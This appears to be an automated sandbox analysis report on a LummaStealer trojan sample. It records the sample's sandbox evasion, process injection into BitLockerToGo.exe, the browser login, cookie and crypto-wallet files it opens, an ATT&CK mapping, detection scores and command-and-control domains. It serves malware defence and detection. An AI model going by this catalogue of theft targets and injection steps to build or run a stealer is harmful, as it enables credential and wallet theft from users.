              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe System information queried: FirmwareTableInformation
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7936 Thread sleep time: -210000s >= -30000s
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7992 Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: 64pOGv7k4N.exe, 00000000.00000002.1645393031.00000000005A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
              Source: BitLockerToGo.exe, 00000003.00000002.1766484120.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1766109037.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.1766484120.000000000328F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1765907004.000000000328C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1766109037.000000000328E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information queried: ProcessInformation
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_0043D910 LdrInitializeThunk,3_2_0043D910

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E3D008
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 442000
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 445000
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 453000
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_00438040 cpuid 3_2_00438040
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: BitLockerToGo.exe, 00000003.00000003.1741119606.0000000003329000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 7912, type: MEMORYSTR
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
              Source: BitLockerToGo.exe, 00000003.00000003.1766109037.00000000032D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
              Source: BitLockerToGo.exe, 00000003.00000003.1766109037.00000000032D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
              Source: BitLockerToGo.exe, 00000003.00000003.1695541502.00000000056DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Jaxx Libertyn
              Source: BitLockerToGo.exe, 00000003.00000003.1766109037.00000000032D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
              Source: BitLockerToGo.exe, 00000003.00000003.1765784734.000000000331F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Exodus
              Source: BitLockerToGo.exe, 00000003.00000002.1766484120.00000000032BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
              Source: BitLockerToGo.exe, 00000003.00000003.1725784713.0000000003326000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BitLockerToGo.exe, 00000003.00000003.1725803632.0000000003319000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\logins.jsonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\prefs.jsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\places.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\cert9.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: Yara match, File source: 00000003.00000003.1725784713.0000000003326000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: BitLockerToGo.exe PID: 7912, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match, File source: Process Memory Space: BitLockerToGo.exe PID: 7912, type: MEMORYSTR
              Source: Yara match, File source: sslproxydump.pcap, type: PCAP
              Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 311 Process Injection | 21 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 311 Process Injection | LSASS Memory | 21 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 41 Data from Local System | 113 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | 2 Clipboard Data | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 32 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 64pOGv7k4N.exe | 74% | ReversingLabs | Win32.Trojan.LummaStealer | |
| 64pOGv7k4N.exe | 72% | Virustotal | | Browse |
| 64pOGv7k4N.exe | 100% | Avira | HEUR/AGEN.1309172 | |
| 64pOGv7k4N.exe | 100% | Joe Sandbox ML | | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| mooncobudy.click | 100% | Avira URL Cloud | malware | |
| https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696513144932.12791&key=1696513144400700 | 0% | Avira URL Cloud | safe | |
| https://mooncobudy.click/d& | 100% | Avira URL Cloud | malware | |
| https://mooncobudy.click:443/apiv1np.default-release/key4.dbPK | 100% | Avira URL Cloud | malware | |
| https://mooncobudy.click/ | 100% | Avira URL Cloud | malware | |
| https://mooncobudy.click:443/apiM | 100% | Avira URL Cloud | malware | |
| https://mooncobudy.click/apijYc | 100% | Avira URL Cloud | malware | |
| https://mooncobudy.click:443/api | 100% | Avira URL Cloud | malware | |
| https://mooncobudy.click/api | 100% | Avira URL Cloud | malware | |
| https://mooncobudy.click/4%G## | 100% | Avira URL Cloud | malware | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high |
| mooncobudy.click | 188.114.97.3 | true | true | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| rabidcowse.shop | false | | high |
| wholersorie.shop | false | | high |
| mooncobudy.click | true | Avira URL Cloud: malware | unknown |
| cloudewahsj.shop | false | | high |
| noisycuttej.shop | false | | high |
| https://mooncobudy.click/api | true | Avira URL Cloud: malware | unknown |
| nearycrepso.shop | false | | high |
| framekgirus.shop | false | | high |
| tirepublicerj.shop | false | | high |
| abruptyopsn.shop | false | | high |
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://mooncobudy.click:443/apiBitLockerToGo.exe, 00000003.00000002.1766484120.00000000032A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://mooncobudy.click/apijYcBitLockerToGo.exe, 00000003.00000003.1708169040.00000000056D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://mooncobudy.click/d&BitLockerToGo.exe, 00000003.00000002.1766664426.0000000003338000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1746691528.0000000003329000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1741691153.0000000003329000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1766085473.0000000003337000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
